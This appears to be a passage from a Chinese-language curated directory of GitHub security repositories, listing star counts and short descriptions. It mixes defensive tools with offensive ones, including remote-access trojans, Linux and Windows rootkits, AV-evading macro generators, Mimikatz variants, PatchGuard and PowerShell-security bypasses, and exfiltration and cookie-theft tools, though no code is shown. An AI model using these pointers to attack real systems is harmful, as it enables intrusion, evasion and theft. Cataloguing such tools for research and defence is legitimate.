[crytic/not-so-smart-contracts](https://github.com/crytic/not-so-smart-contracts) 常见的以太坊智能合约漏洞示例,包括来自真实智能合约的代码。 - [**567**星][4m] [Py] [its-a-feature/apfell](https://github.com/its-a-feature/apfell) 利用python3,docker,docker-compose和Web浏览器UI构建的跨平台,后渗透的Red Team框架。 - [**557**星][1m] [C] [vanhauser-thc/thc-ipv6](https://github.com/vanhauser-thc/thc-ipv6) IPv6攻击工具包 - [**550**星][6m] [HCL] [coalfire-research/red-baron](https://github.com/coalfire-research/red-baron) 为Red Teams自动创建有弹性,disposable,安全和敏捷的基础架构。 - [**542**星][9m] [C] [hfiref0x/upgdsed](https://github.com/hfiref0x/upgdsed) 通用PG和DSE禁用工具 - [**539**星][3m] [C] [eliasoenal/multimon-ng](https://github.com/EliasOenal/multimon-ng) multimon-ng是multimon的继承者。解码多种数字传输模式 - [**537**星][1y] [C#] [ghostpack/safetykatz](https://github.com/ghostpack/safetykatz) Mimikatz和 .NET PE Loader的结合 - [**531**星][13d] [Go] [sensepost/gowitness](https://github.com/sensepost/gowitness) Go 语言编写的网站快照工具 - [**526**星][5d] [Ruby] [hdm/mac-ages](https://github.com/hdm/mac-ages) 确定IEEE分配的硬件地址范围的大概发布日期 - [**520**星][2m] [Shell] [trailofbits/twa](https://github.com/trailofbits/twa) 小型网页审计工具,可灵活设置参数 - [**517**星][2m] [JS] [mr-un1k0d3r/thundershell](https://github.com/mr-un1k0d3r/thundershell) 通过HTTP请求进行通信的C#RAT - [**517**星][5m] [C++] [shuax/greenchrome](https://github.com/shuax/greenchrome) 超好用的Chrome浏览器增强软件 - [**516**星][8m] [Visual Basic .NET] [mr-un1k0d3r/maliciousmacrogenerator](https://github.com/mr-un1k0d3r/maliciousmacrogenerator) 生成混淆的宏,可进行AV /沙箱逃逸 - [**510**星][12m] [Go] [mthbernardes/gtrs](https://github.com/mthbernardes/gtrs) 使用Google翻译器作为代理将任意命令发送到受感染的计算机 - [**505**星][12m] [C] [google/ktsan](https://github.com/google/ktsan) 用于Linux内核的快速数据竞赛检测器 - [**503**星][1m] [JS] [sindresorhus/public-ip](https://github.com/sindresorhus/public-ip) 快速获取外网IP地址 - [**501**星][2m] [C] [m0nad/diamorphine](https://github.com/m0nad/diamorphine) 适用于Linux Kernels 2.6.x / 3.x / 4.x(x86和x86_64)的LKM rootkit - [**500**星][11m] [C] [yangyangwithgnu/bypass_disablefunc_via_ld_preload](https://github.com/yangyangwithgnu/bypass_disablefunc_via_ld_preload) 通过LD_PRELOA绕过disable_functions(不需要/ usr / sbin / sendmail) - [**495**星][3m] [PHP] [nzedb/nzedb](https://github.com/nzedb/nzedb) 自动扫描Usenet,类似于爬虫扫描互联网的方式 - [**492**星][3m] [Go] [gen2brain/cam2ip](https://github.com/gen2brain/cam2ip) 将任何网络摄像头转换为IP 摄像机 - [**488**星][2m] [Py] [aoii103/darknet_chinesetrading](https://github.com/aoii103/darknet_chinesetrading) 暗网中文网监控实时爬虫 - [**488**星][3m] [Go] [gorilla/csrf](https://github.com/gorilla/csrf) 为Go Web应用程序和服务提供CSRF预防中间件 - [**487**星][12m] [Go] [evanmiller/hecate](https://github.com/evanmiller/hecate) Hex编辑器 - [**486**星][11m] [Shell] [craigz28/firmwalker](https://github.com/craigz28/firmwalker) 一个简单的bash脚本,用于搜索提取或安装的固件文件系统。 - [**478**星][1m] [xiangpasama/jdsrc-small-classroom](https://github.com/xiangpasama/jdsrc-small-classroom) 京东SRC小课堂系列文章 - [**478**星][2m] [TS] [mitre-attack/attack-navigator](https://github.com/mitre-attack/attack-navigator) 提供ATT&CK矩阵的基本导航和注释的Web App - [**472**星][2m] [Py] [bit4woo/teemo](https://github.com/bit4woo/teemo) 域名和电子邮件地址收集工具 - [**469**星][20d] [Py] [fportantier/habu](https://github.com/fportantier/habu) Python 编写的网络工具工具包,主要用于教学/理解网络攻击中的一些概念 - [**468**星][2m] [Py] [coleifer/micawber](https://github.com/coleifer/micawber) 用于从URL中提取丰富的内容库 - [**467**星][1m] [Shell] [wireghoul/graudit](https://github.com/wireghoul/graudit) 简单的脚本和签名集,进行源代码审计 - [**465**星][2m] [Go] [gen0cide/gscript](https://github.com/gen0cide/gscript) 基于运行时参数,动态安装恶意软件 - [**462**星][5m] [C] [phoenhex/files](https://github.com/phoenhex/files) Phoenhex 团队的exploits/POCs/presentation - [**461**星][3m] [PS] [rvrsh3ll/misc-powershell-scripts](https://github.com/rvrsh3ll/misc-powershell-scripts) PowerShell工具集 - [**454**星][19d] [PS] [mr-un1k0d3r/redteampowershellscripts](https://github.com/mr-un1k0d3r/redteampowershellscripts) 在红队练习中可能会有用的各种PowerShell脚本 - [**454**星][2m] [Py] [super-l/superl-url](https://github.com/super-l/superl-url) 根据关键词,对搜索引擎内容检索结果的网址内容进行采集的一款轻量级软程序。 程序主要运用于安全渗透测试项目,以及批量评估各类CMS系统0DAY的影响程度,同时也是批量采集自己获取感兴趣的网站的一个小程序~~ 可自动从搜索引擎采集相关网站的真实地址与标题等信息,可保存为文件,自动去除重复URL。同时,也可以自定义忽略多条域名等。 - [**450**星][4m] [C++] [omerya/invisi-shell](https://github.com/omerya/invisi-shell) 隐藏您的Powershell脚本。绕过所有Powershell安全功能 - [**431**星][7m] [Pascal] [mojtabatajik/robber](https://github.com/mojtabatajik/robber) 查找易于发生DLL劫持的可执行文件 - [**431**星][11d] [C++] [tenable/routeros](https://github.com/tenable/routeros) 对 MikroTik的RouterOS进行安全性研究时使用的各种工具和漏洞 - [**421**星][8m] [7kbstorm/7kbscan-webpathbrute](https://github.com/7kbstorm/7kbscan-webpathbrute) 路径暴力探测工具 - [**420**星][11m] [Py] [powerscript/katanaframework](https://github.com/powerscript/katanaframework) 用于进行渗透测试的框架,基于一个简单而全面的结构,任何人都可以使用,修改和共享。Python编写 - [**411**星][5d] [HTML] [w3c/webappsec](https://github.com/w3c/webappsec) Web App安全工作组 - [**411**星][15d] [Py] [ytisf/pyexfil](https://github.com/ytisf/pyexfil) 用于数据渗透的Python包 - [**409**星][10m] [Py] [linklayer/pyvit](https://github.com/linklayer/pyvit) 与汽车接口的工具包。它旨在实现汽车系统中使用的通用硬件接口和协议。 - [**408**星][2d] [Go] [cloudfoundry/gorouter](https://github.com/cloudfoundry/gorouter) CF Router - [**401**星][1m] [Py] [fbngrm/matroschka](https://github.com/fbngrm/Matroschka) Python隐写术工具,可在图像中红隐藏文本或图像 - [**391**星][12d] [C++] [simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) 取证工具 - [**389**星][24d] [Ruby] [david942j/seccomp-tools](https://github.com/david942j/seccomp-tools) 用于seccomp分析 - [**386**星][4m] [PHP] [msurguy/honeypot](https://github.com/msurguy/honeypot) 一种简单有效的方法,来阻止某些进入您网站的垃圾邮件机器人 - [**384**星][11d] [C#] [bloodhoundad/sharphound](https://github.com/bloodhoundad/sharphound) C#重写BloodHound Ingestor - [**383**星][1y] [JS] [empireproject/empire-gui](https://github.com/empireproject/empire-gui) Empire开渗透框架的图形界面 - [**383**星][1m] [JS] [nccgroup/tracy](https://github.com/nccgroup/tracy) 查找web app中所有的sinks and sources, 并以易于理解的方式显示这些结果 - [**381**星][1m] [Py] [fox-it/bloodhound.py](https://github.com/fox-it/bloodhound.py) 基于Python的BloodHound Ingestor,基于Impacket - [**379**星][9m] [Py] [k4m4/onioff](https://github.com/k4m4/onioff) url检测器,深度检测网页链接 - [**376**星][2d] [Ruby] [dradis/dradis-ce](https://github.com/dradis/dradis-ce) 面向信息安全团队的协作框架 - [**376**星][7m] [Py] [tidesec/tidefinger](https://github.com/tidesec/tidefinger) 指纹识别小工具,汲取整合了多个web指纹库,结合了多种指纹检测方法,让指纹检测更快捷、准确。 - [**375**星][] [C] [vanhauser-thc/aflplusplus](https://github.com/vanhauser-thc/aflplusplus) 带社区补丁的afl 2.56b - [**375**星][6m] [Py] [vysecurity/domlink](https://github.com/vysecurity/DomLink) 一种将具有注册组织名称和电子邮件的域链接到其他域的工具。 - [**369**星][2m] [Py] [emtunc/slackpirate](https://github.com/emtunc/slackpirate) Slack枚举和提取工具-从Slack工作区中提取敏感信息 - [**367**星][20d] [Shell] [trimstray/otseca](https://github.com/trimstray/otseca) 安全审计工具, 搜索并转储系统配置 - [**364**星][1m] [Py] [tenable/poc](https://github.com/tenable/poc) 漏洞PoC - [**363**星][2m] [Py] [codingo/interlace](https://github.com/codingo/interlace) 轻松将单线程命令行应用程序转换为具有CIDR和glob支持的快速,多线程应用程序。 - [**363**星][11m] [Py] [secynic/ipwhois](https://github.com/secynic/ipwhois) 检索和解析IPv4和IPv6地址的Whois数据 - [**359**星][4d] [C#] [sonarsource/sonar-dotnet](https://github.com/sonarsource/sonar-dotnet) 用于C#和VB.NET语言的静态代码分析器,用作SonarQube和SonarCloud平台的扩展。 - [**356**星][7d] [TeX] [vlsergey/infosec](https://github.com/vlsergey/infosec) MIPT无线电工程与控制系统部信息保护教科书 - [**356**星][21d] [hackerschoice/thc-tesla-powerwall2-hack](https://github.com/hackerschoice/thc-tesla-powerwall2-hack) TESLA PowerWall 2安全雪茄 - [**355**星][19d] [Py] [lockgit/hacking](https://github.com/lockgit/hacking) Hacking工具收集 - [**355**星][5m] [Makefile] [xdite/internet-security](https://github.com/xdite/internet-security) 互联网资安风控实战 - [**347**星][7d] [Ruby] [sunitparekh/data-anonymization](https://github.com/sunitparekh/data-anonymization) 帮助您构建匿名的生产数据转储,可用于性能测试,安全性测试,调试和开发。 - [**346**星][19d] [Perl] [keydet89/regripper2.8](https://github.com/keydet89/regripper2.8) 从注册表中提取/解析信息(键,值,数据)并将其呈现出来进行分析。 - [**344**星][1y] [Assembly] [egebalci/amber](https://github.com/egebalci/amber) 反射式PE加壳器,用于绕过安全产品和缓解措施 - [**343**星][2m] [veracode-research/solr-injection](https://github.com/veracode-research/solr-injection) Apache Solr注入研究 - [**342**星][9m] [Py] [skorov/ridrelay](https://github.com/skorov/ridrelay) 通过使用具有低priv的SMB中继来枚举您没有信誉的域上的用户名。 - [**340**星][11d] [C#] [mr-un1k0d3r/scshell](https://github.com/mr-un1k0d3r/scshell) Fileless lateral movement tool that relies on ChangeServiceConfigA to run command - [**339**星][4d] [JS] [meituan-dianping/lyrebird](https://github.com/meituan-dianping/lyrebird) 基于拦截以及模拟HTTP/HTTPS网络请求的面向移动应用的插件化测试工作台 - [**339**星][1y] [Ruby] [srcclr/commit-watcher](https://github.com/srcclr/commit-watcher) Find interesting and potentially hazardous commits in git projects - [**335**星][4m] [C] [csete/gpredict](https://github.com/csete/gpredict) a real time satellite tracking and orbit prediction program for the Linux desktop - [**332**星][11m] [C#] [ghostpack/sharpdump](https://github.com/ghostpack/sharpdump) SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. - [**332**星][1y] [Py] [leapsecurity/inspy](https://github.com/leapsecurity/InSpy) A python based LinkedIn enumeration tool - [**331**星][1y] [Shell] [1n3/goohak](https://github.com/1n3/goohak) Automatically Launch Google Hacking Queries Against A Target Domain - [**328**星][1y] [Java] [ysrc/liudao](https://github.com/ysrc/liudao) “六道”实时业务风控系统 - [**327**星][3m] [Py] [defaultnamehere/cookie_crimes](https://github.com/defaultnamehere/cookie_crimes) Read local Chrome cookies without root or decrypting - [**326**星][2m] [PS] [joelgmsec/autordpwn](https://github.com/joelgmsec/autordpwn) The Shadow Attack Framework - [**326**星][1y] [JS] [nccgroup/wssip](https://github.com/nccgroup/wssip) 服务器和客户端之间通信时自定义 WebSocket 数据的捕获、修改和发送。 - [**326**星][1m] [Go] [wangyihang/platypus](https://github.com/wangyihang/platypus) A modern multiple reverse shell sessions/clients manager via terminal written in go - [**325**星][21d] [Shell] [al0ne/linuxcheck](https://github.com/al0ne/linuxcheck) linux信息收集/应急响应/常见后门检测脚本 - [**324**星][12d] [JS] [privacypass/challenge-bypass-extension](https://github.com/privacypass/challenge-bypass-extension) 用于匿名认证的浏览器扩展 - [**323**星][1m] [trustedsec/physical-docs](https://github.com/trustedsec/physical-docs) This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments. - [**322**星][1y] [crazywa1ker/darthsidious-chinese](https://github.com/crazywa1ker/darthsidious-chinese) 从0开始你的域渗透之旅 - [**318**星][2m] [Visual Basic .NET] [nccgroup/vcg](https://github.com/nccgroup/vcg) Code security scanning tool. - [**317**星][5d] [Py] [circl/lookyloo](https://github.com/circl/lookyloo) Lookyloo is a web interface allowing to scrape a website and then displays a tree of domains calling each other. - [**316**星][22d] [HTML] [vanhauser-thc/thc-archive](https://github.com/vanhauser-thc/thc-archive) All releases of the security research group (a.k.a. hackers) The Hacker's Choice - [**315**星][6d] [VBA] [itm4n/vba-runpe](https://github.com/itm4n/vba-runpe) A VBA implementation of the RunPE technique or how to bypass application whitelisting. - [**315**星][8m] [C] [tomac/yersinia](https://github.com/tomac/yersinia) layer 2 攻击框架 - [**315**星][1y] [Go] [benjojo/bgp-battleships](https://github.com/benjojo/bgp-battleships) Play battleships using BGP - [**313**星][2m] [Py] [coalfire-research/slackor](https://github.com/coalfire-research/slackor) A Golang implant that uses Slack as a command and control server - [**312**星][7m] [C] [pmem/syscall_intercept](https://github.com/pmem/syscall_intercept) Linux系统调用拦截框架,通过 hotpatching 进程标准C库的机器码实现。 - [**312**星][5m] [Java] [shengqi158/fastjson-remote-code-execute-poc](https://github.com/shengqi158/fastjson-remote-code-execute-poc) 直接用intellij IDEA打开即可 首先编译得到Test.class,然后运行Poc.java - [**311**星][7m] [HTML] [nccgroup/crosssitecontenthijacking](https://github.com/nccgroup/crosssitecontenthijacking) Content hijacking proof-of-concept using Flash, PDF and Silverlight - [**311**星][1m] [YARA] [needmorecowbell/hamburglar](https://github.com/needmorecowbell/hamburglar) collect useful information from urls, directories, and files - [**310**星][2m] [PS] [darkoperator/posh-secmod](https://github.com/darkoperator/posh-secmod) PowerShell Module with Security cmdlets for security work - [**309**星][4m] [PS] [enigma0x3/misc-powershell-stuff](https://github.com/enigma0x3/misc-powershell-stuff) random powershell goodness - [**305**星][3m] [C] [9176324/shark](https://github.com/9176324/shark) Turn off PatchGuard in real time for win7 (7600) ~ win10 (18950). - [**305**星][7d] [ugvf2009/miles](https://github.com/ugvf2009/miles) 二爷翻墙,专注翻墙30年,但没有掌握核心科技^_^ - [**305**星][11d] [Py] [xinsss/conf-for-surge-shadowrocket](https://github.com/xinsss/conf-for-surge-shadowrocket) Surge Shadowrocket conf - [**304**星][2m] [JS] [doyensec/electronegativity](https://github.com/doyensec/electronegativity) Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron applications. - [**300**星][] [C++] [squalr/squally](https://github.com/squalr/squally) 2D Platformer Game for Teaching Game Hacking - C++/cocos2d-x - [**300**星][1m] [C] [tarsnap/scrypt](https://github.com/tarsnap/scrypt) The scrypt key derivation function was originally developed for use in the Tarsnap online backup system and is designed to be far more secure against hardware brute-force attacks than alternative functions such as PBKDF2 or bcrypt. - [**299**星][10m] [C++] [anhkgg/superdllhijack](https://github.com/anhkgg/superdllhijack) SuperDllHijack:A general DLL hijack technology, don't need to manually export the same function interface of the DLL, so easy! 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了 - [**299**星][1y] [C#] [ghostpack/sharpup](https://github.com/ghostpack/sharpup) SharpUp is a C# port of various PowerUp functionality. - [**298**星][7m] [Py] [edent/bmw-i-remote](https://github.com/edent/bmw-i-remote) A reverse engineered interface for the BMW i3 Electric Car - [**298**星][14d] [Shell] [fdiskyou/zines](https://github.com/fdiskyou/zines) Mirror of my favourite hacking Zines for the lulz, nostalgy, and reference - [**297**星][10d] [JS] [jesusprubio/strong-node](https://github.com/jesusprubio/strong-node) - [**297**星][1y] [JS] [xxxily/fiddler-plus](https://github.com/xxxily/fiddler-plus) 自定义的Fiddler规则,多环境切换、解决跨域开发、快速调试线上代码必备|高效调试分析利器 - [**296**星][9m] [C] [gianlucaborello/libprocesshider](https://github.com/gianlucaborello/libprocesshider) Hide a process under Linux using the ld preloader ( - [**295**星][2m] [Go] [mdsecactivebreach/o365-attack-toolkit](https://github.com/mdsecactivebreach/o365-attack-toolkit) A toolkit to attack Office365 - [**295**星][9m] [C] [rhboot/shim](https://github.com/rhboot/shim) a trivial EFI application that, when run, attempts to open and execute another application - [**292**星][9d] [Go] [cruise-automation/fwanalyzer](https://github.com/cruise-automation/fwanalyzer) a tool to analyze filesystem images for security - [**292**星][2m] [C] [mboehme/aflfast](https://github.com/mboehme/aflfast) AFLFast (extends AFL with Power Schedules) - [**292**星][2d] [Py] [vulnerscom/api](https://github.com/vulnerscom/api) Python 2/3 library for the Vulners Database - [**290**星][20d] [C#] [matterpreter/offensivecsharp](https://github.com/matterpreter/offensivecsharp) Collection of Offensive C# Tooling - [**290**星][5m] [Py] [opsdisk/pagodo](https://github.com/opsdisk/pagodo) pagodo (Passive Google Dork) - Automate Google Hacking Database scraping - [**288**星][12m] [Py] [justicerage/ffm](https://github.com/justicerage/ffm) Freedom Fighting Mode: open source hacking harness - [**287**星][3m] [Py] [apache/incubator-spot](https://github.com/apache/incubator-spot) Mirror of Apache Spot - [**283**星][16d] [PS] [nullbind/powershellery](https://github.com/nullbind/powershellery) This repo contains Powershell scripts used for general hackery. - [**282**星][3m] [Py] [hacktoolspack/hack-tools](https://github.com/hacktoolspack/hack-tools) hack tools - [**282**星][4m] [Py] [joxeankoret/pyew](https://github.com/joxeankoret/pyew) Official repository for Pyew. - [**282**星][13d] [PHP] [nico3333fr/csp-useful](https://github.com/nico3333fr/csp-useful) Collection of scripts, thoughts about CSP (Content Security Policy) - [**282**星][1y] [HTML] [googleprojectzero/p0tools](https://github.com/googleprojectzero/p0tools) Project Zero Docs and Tools - [**278**星][5d] [geerlingguy/ansible-role-security](https://github.com/geerlingguy/ansible-role-security) Ansible Role - Security - [**277**星][5m] [Py] [18f/domain-scan](https://github.com/18f/domain-scan) A lightweight pipeline, locally or in Lambda, for scanning things like HTTPS, third party service use, and web accessibility. - [**277**星][8m] [s0md3v/mypapers](https://github.com/s0md3v/mypapers) Repository for hosting my research papers - [**276**星][28d] [C#] [mkaring/confuserex](https://github.com/mkaring/confuserex) An open-source, free protector for .NET applications - [**274**星][4m] [Py] [invernizzi/scapy-http](https://github.com/invernizzi/scapy-http) Support for HTTP in Scapy - [**273**星][15d] [Py] [den1al/jsshell](https://github.com/den1al/jsshell) An interactive multi-user web JS shell - [**271**星][8m] [offensive-security/nethunter-lrt](https://github.com/offensive-security/nethunter-lrt) The Nethunter Linux Root Toolkit is a collection of bash scripts which install Nethunter onto a supported device. - [**271**星][8m] [Py] [s0md3v/breacher](https://github.com/s0md3v/Breacher) An advanced multithreaded admin panel finder written in python. - [**269**星][18d] [Py] [ledger-donjon/lascar](https://github.com/ledger-donjon/lascar) Ledger's Advanced Side-Channel Analysis Repository - [**269**星][5d] [JS] [nodejs/security-wg](https://github.com/nodejs/security-wg) Node.js Security Working Group - [**265**星][5d] [C] [eua/wxhexeditor](https://github.com/eua/wxhexeditor) wxHexEditor official GIT repo - [**265**星][1y] [PS] [fox-it/invoke-aclpwn](https://github.com/fox-it/invoke-aclpwn) - [**264**星][11m] [Py] [ant4g0nist/susanoo](https://github.com/ant4g0nist/susanoo) A REST API security testing framework. - [**264**星][t] [C++] [fransbouma/injectablegenericcamerasystem](https://github.com/fransbouma/injectablegenericcamerasystem) This is a generic camera system to be used as the base for cameras for taking screenshots within games. The main purpose of the system is to hijack the in-game 3D camera by overwriting values in its camera structure with our own values so we can control where the camera is located, it's pitch/yaw/roll values, its FoV and the camera's look vector. - [**264**星][9m] [C] [landhb/hideprocess](https://github.com/landhb/hideprocess) A basic Direct Kernel Object Manipulation rootkit that removes a process from the EPROCESS list, hiding it from the Task Manager - [**264**星][1y] [JS] [roccomuso/netcat](https://github.com/roccomuso/netcat) Netcat client and server modules written in pure Javascript for Node.j - [**263**星][25d] [Py] [guimaizi/get_domain](https://github.com/guimaizi/get_domain) 域名收集与监测 - [**263**星][1m] [Ruby] [rapid7/recog](https://github.com/rapid7/recog) Pattern recognition for hosts, services, and content - [**262**星][4m] [C] [portcullislabs/linikatz](https://github.com/portcullislabs/linikatz) UNIX版本的Mimikatz - [**262**星][] [rustsec/advisory-db](https://github.com/rustsec/advisory-db) Security advisory database for Rust crates published through crates.io - [**262**星][6d] [Py] [sofianehamlaoui/lockdoor-framework](https://github.com/sofianehamlaoui/lockdoor-framework) - [**260**星][12m] [Py] [hysnsec/devsecops-studio](https://github.com/hysnsec/DevSecOps-Studio) DevSecOps Distribution - Virtual Environment to learn DevSecOps - [**259**星][10d] [C++] [poweradminllc/paexec](https://github.com/poweradminllc/paexec) Remote execution, like PsExec - [**258**星][1y] [Py] [m4ll0k/galileo](https://github.com/m4ll0k/galileo) Galileo - Web Application Audit Framework - [**257**星][1m] [Py] [frint0/email-enum](https://github.com/frint0/email-enum) Email-Enum searches mainstream websites and tells you if an email is registered! #DEPRECATED - [**257**星][10m] [C] [p0f/p0f](https://github.com/p0f/p0f) p0f unofficial git repo - [**255**星][1m] [Py] [cloudflare/python-cloudflare](https://github.com/cloudflare/python-cloudflare) Python wrapper for the Cloudflare Client API v4 - [**254**星][7m] [Go] [lavalamp-/ipv666](https://github.com/lavalamp-/ipv666) IPV6地址枚举工具. Go编写 - [**254**星][10m] [Py] [wh0ale/src-experience](https://github.com/wh0ale/src-experience) 工欲善其事,必先利其器 - [**252**星][3m] [Py] [cvandeplas/pystemon](https://github.com/cvandeplas/pystemon) Monitoring tool for PasteBin-alike sites written in Python. Inspired by pastemon - [**252**星][7m] [Py] [itskindred/procspy](https://github.com/itskindred/procspy) Python tool that monitors and logs user-run commands on a Linux system for either offensive or defensive purposes.. - [**252**星][1m] [Py] [rvrsh3ll/findfrontabledomains](https://github.com/rvrsh3ll/findfrontabledomains) Search for potential frontable domains - [**250**星][9m] [C] [jakeajames/rootlessjb](https://github.com/jakeajames/rootlessjb) - [**249**星][19d] [Py] [cisco-config-analysis-tool/ccat](https://github.com/cisco-config-analysis-tool/ccat) Cisco Config Analysis Tool - [**248**星][8d] [Py] [susmithkrishnan/torghost](https://github.com/SusmithKrishnan/torghost) Tor anonimizer - [**246**星][8m] [ethicalhack3r/wordpress_plugin_security_testing_cheat_sheet](https://github.com/ethicalhack3r/wordpress_plugin_security_testing_cheat_sheet) WordPress插件安全测试备忘录。 - [**246**星][1y] [xcsh/unity-game-hacking](https://github.com/xcsh/unity-game-hacking) A guide for hacking unity games - [**244**星][9m] [Py] [mazen160/bfac](https://github.com/mazen160/bfac) 自动化 web app 备份文件测试工具,可检测备份文件是否会泄露 web app 源代码 - [**244**星][8m] [Py] [openstack/syntribos](https://github.com/openstack/syntribos) 自动化的 API 安全测试工具 - [**242**星][19d] [Rust] [hirrolot/anevicon](https://github.com/Hirrolot/anevicon) - [**239**星][1y] [Py] [matthewclarkmay/geoip-attack-map](https://github.com/matthewclarkmay/geoip-attack-map) Cyber security geoip attack map that follows syslog and parses IPs/port numbers to visualize attackers in real time. - [**238**星][2m] [JS] [martinzhou2015/srcms](https://github.com/martinzhou2015/srcms) SRCMS企业应急响应与缺陷管理系统 - [**238**星][2m] [Py] [timlib/webxray](https://github.com/timlib/webxray) webxray is a tool for analyzing third-party content on webpages and identifying the companies which collect user data. - [**237**星][11m] [duoergun0729/2book](https://github.com/duoergun0729/2book) 《Web安全之深度学习实战》 - [**236**星][10m] [Py] [cryin/javaid](https://github.com/cryin/javaid) java source code static code analysis and danger function identify prog - [**236**星][8m] [Py] [xhak9x/fbi](https://github.com/xhak9x/fbi) Facebook Information - [**231**星][18d] [o-mg/demonseed](https://github.com/o-mg/demonseed) minimal malicious USB cabl - [**231**星][3d] [Py] [webbreacher/whatsmyname](https://github.com/webbreacher/whatsmyname) This repository has the unified data required to perform user enumeration on various websites. Content is in a JSON file and can easily be used in other projects. - [**230**星][2m] [Java] [commonsguy/cwac-netsecurity](https://github.com/commonsguy/cwac-netsecurity) CWAC-NetSecurity: Simplifying Secure Internet Access - [**230**星][2m] [PS] [miriamxyra/eventlist](https://github.com/miriamxyra/eventlist) help improving your Audit capabilities and to help to build your Security Operation Center. - [**229**星][1m] [C] [vusec/ridl](https://github.com/vusec/ridl) RIDL test suite and exploits - [**226**星][1y] [Go] [netxfly/sec_check](https://github.com/netxfly/sec_check) 服务器安全检测的辅助工具 - [**226**星][1y] [lanjelot/kb](https://github.com/lanjelot/kb) Respositoy of all my notes on infosec I have been building up over the years - [**224**星][1y] [basilfx/tradfri-hacking](https://github.com/basilfx/tradfri-hacking) Hacking the IKEA TRÅDFRI light bulbs and accessories. - [**223**星][1y] [Py] [tkcert/mail-security-tester](https://github.com/tkcert/mail-security-tester) A testing framework for mail security and filtering solutions. - [**221**星][7m] [bhdresh/dejavu](https://github.com/bhdresh/dejavu) deception framework which can be used to deploy decoys across the infrastructure - [**220**星][5m] [Shell] [vedetta-com/vedetta](https://github.com/vedetta-com/vedetta) OpenBSD Router Boilerplate - [**220**星][15d] [Py] [wazuh/wazuh-ruleset](https://github.com/wazuh/wazuh-ruleset) ruleset is used to detect attacks, intrusions, software misuse, configuration problems, application errors, malware, rootkits, system anomalies or security policy violations. - [**219**星][9m] [JS] [zhuyingda/veneno](https://github.com/zhuyingda/veneno) 用Node.js编写的Web安全测试框架 - [**218**星][10m] [C] [feexd/pocs](https://github.com/feexd/pocs) - [**218**星][10m] [JS] [jopyth/mmm-remote-control](https://github.com/jopyth/mmm-remote-control) Magic Mirror Module to shutdown or configure your mirror - [**217**星][10m] [Py] [mckinsey666/vocabs](https://github.com/Mckinsey666/vocabs) A lightweight online dictionary integration to the command line - [**216**星][3m] [Py] [jordanpotti/cloudscraper](https://github.com/jordanpotti/cloudscraper) Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space. - [**216**星][9m] [C] [sleinen/samplicator](https://github.com/sleinen/samplicator) Send copies of (UDP) datagrams to multiple receivers, with optional sampling and spoofing - [**215**星][6m] [C#] [erfg12/memory.dll](https://github.com/erfg12/memory.dll) C# Hacking library for making PC game trainers. - [**214**星][5m] [Py] [infosecn1nja/maliciousmacromsbuild](https://github.com/infosecn1nja/maliciousmacromsbuild) Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. - [**213**星][6m] [Py] [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) Kerberos unconstrained delegation abuse toolkit - [**213**星][27d] [Py] [nyxgeek/lyncsmash](https://github.com/nyxgeek/lyncsmash) locate and attack Lync/Skype for Business - [**210**星][5m] [Java] [dschanoeh/kayak](https://github.com/dschanoeh/kayak) Kayak is a CAN bus analysis tool based on SocketCAN - [**210**星][3m] [Py] [si9int/cc.py](https://github.com/si9int/cc.py) Extracting URLs of a specific target based on the results of "commoncrawl.org" - [**210**星][2m] [Shell] [hak5/lanturtle-modules](https://github.com/hak5/lanturtle-modules) The Official LAN Turtle Module Repository - [**209**星][5m] [PS] [harmj0y/damp](https://github.com/harmj0y/damp) The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification - [**208**星][11d] [C#] [b4rtik/redpeanut](https://github.com/b4rtik/redpeanut) RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0. - [**208**星][1m] [Py] [seahoh/gotox](https://github.com/seahoh/gotox) 本地自动代理,修改自 goagent。 - [**207**星][8m] [1hack0/facebook-bug-bounty-write-ups](https://github.com/1hack0/facebook-bug-bounty-write-ups) Hunting Bugs for Fun and Profit - [**207**星][4m] [HCL] [byt3bl33d3r/red-baron](https://github.com/byt3bl33d3r/red-baron) Automate creating resilient, disposable, secure and agile infrastructure for Red Teams - [**207**星][5m] [YARA] [th3hurrican3/pepper](https://github.com/th3hurrican3/pepper) An open source script to perform malware static analysis on Portable Executable - [**206**星][1y] [JS] [jpcertcc/sysmonsearch](https://github.com/jpcertcc/sysmonsearch) Investigate suspicious activity by visualizing Sysmon's event log - [**206**星][1y] [Py] [orf/xcat](https://github.com/orf/xcat) 辅助盲 Xpath 注入,检索正在由 Xpath 查询处理的整个 XML 文档,读取主机文件系统上的任意文件,并使用出站 HTTP 请求,使服务器将数据直接发送到xcat - [**206**星][9m] [Py] [openstack/hacking](https://github.com/openstack/hacking) OpenStack Hacking Style Checks - [**204**星][1m] [Jupyter Notebook] [hunters-forge/attack-python-client](https://github.com/hunters-forge/ATTACK-Python-Client) Python Script to access ATT&CK content available in STIX via a public TAXII server - [**203**星][2m] [TS] [helmetjs/csp](https://github.com/helmetjs/csp) Content Security Policy middleware - [**203**星][7m] [JS] [wingleung/save-page-state](https://github.com/wingleung/save-page-state) A chrome extension to save the state of a page for further analysis - [**202**星][10d] [C++] [oisf/libhtp](https://github.com/oisf/libhtp) LibHTP is a security-aware parser for the HTTP protocol and the related bits and pieces. ### <a id="f34b4da04f2a77a185729b5af752efc5"></a>未分类 ### <a id="b9dc08e7e118fc7af41df5e0ef9ddc3c"></a>新添加1 ### <a id="efb2cfb167e34b03243547cfb3a662ac"></a>新添加2 ### <a id="f04dd1be8e552b074dde7cb33ae6c84c"></a>未分类3 ### <a id="cbb37de8d70e314ce905d78c566ef384"></a>未分类4 ### <a id="bb7173c3a2ea52d046c8abe3c57e3291"></a>未分类5 ### <a id="f7654997cf8b691617b89c5e523a942f"></a>其他 - [**923**星][3d] [C] [arm-software/arm-trusted-firmware](https://github.com/arm-software/arm-trusted-firmware) Arm A-Profile体系结构(Armv8-A和Armv7-A)的安全世界软件的参考实现,其中包括Exception Level 3(EL3)安全监视器。 *** ## <a id="d5e869a870d6e2c14911de2bc527a6ef"></a>古老的&&有新的替代版本的 - [**1605**星][3m] 